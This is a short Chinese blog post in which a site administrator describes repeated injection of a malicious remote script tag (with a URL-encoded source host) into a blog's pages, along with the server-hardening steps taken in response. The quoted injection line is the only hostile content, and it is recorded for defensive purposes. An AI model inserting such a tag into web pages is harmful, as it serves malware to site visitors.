script页面挂马
原创
©著作权归作者所有:来自51CTO博客作者bureses的原创作品,谢绝转载,否则将追究法律责任
近段时间,blog经常被<script src=http://%76%63%63%64%2E%63%6E></script>挂上木马。搜集资料,也做过相应css样式来解决,但css不能阻止页面有此木马,只是客户端访问的时候,屏蔽掉或者终止掉,测试后杀毒软件还是会提示网页有木马。
因为程序时间安排非常紧张,改代码不太可能。我就只能从系统设置方面找出路了,其一,把系统文件的相应权限降到最低;其二,就是可以把组件名称改掉;其三,把后台和serv-u的密码统一更改了一遍;其四,把web在本地的目录取消写入权限,因为此blog都是数据库来进行写操作的,所以可以去掉user的写入权限。
现已经有一天没有被挂马了,但处于观察期间,还不能说根本解决问题,因为代码还是存在漏洞的。
上一篇:系统安全日志里有IUSER账号
下一篇:我的友情链接

提问和评论都可以,用心的回复会被更多人看到
评论
发布评论
相关文章
-
保障web安全(防页面篡改/挂马)经典脚本鉴赏
保障web安全(防页面篡改/挂马)经典脚本鉴赏
ruby 服务器 监控系统